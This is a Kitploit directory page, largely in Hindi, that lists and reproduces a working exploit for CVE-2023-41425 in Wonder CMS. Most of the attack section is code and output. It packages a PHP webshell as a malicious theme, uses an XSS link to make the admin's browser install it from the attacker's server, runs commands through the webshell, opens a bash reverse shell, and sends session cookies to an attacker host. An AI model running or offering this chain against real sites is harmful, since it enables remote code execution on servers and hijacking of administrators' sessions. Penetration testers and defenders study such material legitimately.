Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-41425 — Wonder CMS 3.2.0–3.4.2 के लिए XSS-to-RCE शोषण, स्वचालित थीम इंजेक्शन, PHP वेबशेल तैनाती, रिवर्स शेल, और निर्मित JavaScript पेलोड के माध्यम से कुकी चोरी। | Kitploit
उपकरण/GitHubGitHub/raffli-dev/cve-2023-41425
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणरिमोट एक्सेस टूल
GitHubraffli-dev/cve-2023-41425

CVE-2023-41425

Wonder CMS 3.2.0–3.4.2 के लिए XSS-to-RCE शोषण, स्वचालित थीम इंजेक्शन, PHP वेबशेल तैनाती, रिवर्स शेल, और निर्मित JavaScript पेलोड के माध्यम से कुकी चोरी।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

https://sploitus.com/exploit?id=3A833277-4844-5F02-AFEF-5EA6BA8AC1AC

############## Wonder CMS RCE ##############

| | विवरण : XSS से RCE, Wonder CMS 3.2.0 <= 3.4.2 | स्रोत | - https://github.com/prodigiousMind/CVE-2023-41425/tree/main | - https://nvd.nist.gov/vuln/detail/CVE-2023-41425 |


RCE


.. code-block:: bash

Setting vars

$RHOST="http://host.com:80"
$LHOST="10.10.14.152"
$LPORT="4444"
$LPORTWEB="80"

Moving to a tmp dir

cd $(mktemp -d)

Creating our evil theme zip file

root@kitploit:~
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF
root@kitploit:~
zip -r evil.zip evil/

JS payload that will install the new theme

root@kitploit:~
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF

Print XSS url

root@kitploit:~
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF

Starting a new web server to serve payloads

root@kitploit:~
sudo python3 -m http.server $LPORTWEB &

|

| प्रशासक को RCE XSS भेजने के बाद हमें निम्न HTTP कॉल मिलते हैं

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| अब हम php पेलोड का उपयोग कर सकते हैं

.. code-block:: bash

id

CMD="id"

root@kitploit:~
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell, (don't forget to listen first: nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"

curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|


कुकीज़


| आप कुकीज़ भी चुरा सकते हैं (और इस प्रकार php सत्र)

.. code-block:: bash

cat <xsscookie.js var xhr=new XMLHttpRequest(); xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true); xhr.send(); EOF

echo -e "\n# XSS Retrieve PHP session" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"><form+action=" EOF

|

टूल डाउनलोड करें